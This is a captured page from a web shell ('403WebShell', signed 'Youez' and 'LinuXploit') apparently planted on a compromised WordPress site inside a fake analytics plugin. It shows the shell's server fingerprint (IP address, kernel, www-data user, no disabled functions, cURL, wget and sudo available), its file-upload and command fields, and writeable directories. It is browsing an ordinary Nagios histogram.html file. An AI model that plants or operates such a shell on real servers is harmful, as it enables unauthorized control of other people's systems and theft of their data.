Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/local/nagios/share/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/nagios/share/histogram.html
<!DOCTYPE html>
<html ng-app="histogramApp">
	<head>
		<meta charset="utf-8">
		<title>Nagios Histogram</title>
		<link type="image/ico" rel="shortcut icon" href="images/favicon.ico"/>
		<link type="text/css" rel="stylesheet"
				href="bootstrap-3.3.7/css/bootstrap.min.css">
		<link type="text/css" rel="stylesheet"
				href="bootstrap-3.3.7/css/bootstrap-theme.min.css">
		<link type='text/css' rel='stylesheet' href='stylesheets/common.css'>
		<link type='text/css' rel='stylesheet'
				href='stylesheets/histogram.css'>
		<link type='text/css' rel='stylesheet'
				href='stylesheets/histogramgraph.css'>
		<script type="text/javascript"
				src="angularjs/angular-1.3.9/angular.min.js"></script>
		<script type="text/javascript"
				src="angularjs/ui-bootstrap-tpls-0.14.3.min.js"></script>
		<script type="text/javascript"
				src="angularjs/ui-utils-0.2.3/ui-utils.js"></script>
		<script type="text/javascript" src="d3/d3.min.js"></script>
		<script type="text/javascript" src="spin/spin.min.js"></script>
		<script type="text/javascript" src="js/histogram.js"></script>
		<script type="text/javascript" src="js/histogram-events.js"></script>
		<script type="text/javascript" src="js/histogram-form.js"></script>
		<script type="text/javascript" src="js/histogram-graph.js"></script>
		<script type="text/javascript" src="js/nagios-decorations.js"></script>
		<script type="text/javascript" src="js/nagios-time.js"></script>
	</head>
	<body ng-controller="histogramCtrl">
		<div class="container-fluid">
			<div class="row">
				<div class="col-md-3">
					<div info-box
						cgiurl="{{params.cgiurl}}"
						decoration-title="{{infoBoxTitle()}}"
						last-update="lastUpdate">
					</div>
					<div ng-include="'histogram-links.html'">
					</div>
				</div>
				<div class="col-md-6" align="center"
						ng-include="'graph-header.html'">
				</div>
			</div>
			<div class="row">
				<div class="col-sm-l2 col-md-12 col-lg-10 col-lg-offset-1">
					<div ng-hide="formDisplayed" nagios-histogram
						cgiurl="{{params.cgiurl}}"
						reporttype="{{params.reporttype}}"
						host="{{params.host}}"
						service="{{params.service}}"
						timeperiod="{{params.timeperiod}}"
						t1="{{params.t1}}" t2="{{params.t2}}"
						breakdown="{{params.breakdown}}"
						graphevents="{{params.graphevents}}"
						graphstatetypes="{{params.graphstatetypes}}"
						assumestateretention="{{params.assumestateretention}}"
						initialstateslogged="{{params.initialstateslogged}}"
						ignorerepeatedstates="{{params.ignorerepeatedstates}}"
						last-update="lastUpdate"
						reload="{{reload}}"
						build="canBuildHistogram()">
					</div>

					<div id="menubutton">
						<button type="button" class="btn" ng-click="displayForm()">
							<img src="images/menu.png"/>
						</button>
					</div>
				</div>
			</div>
		</div>

	</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit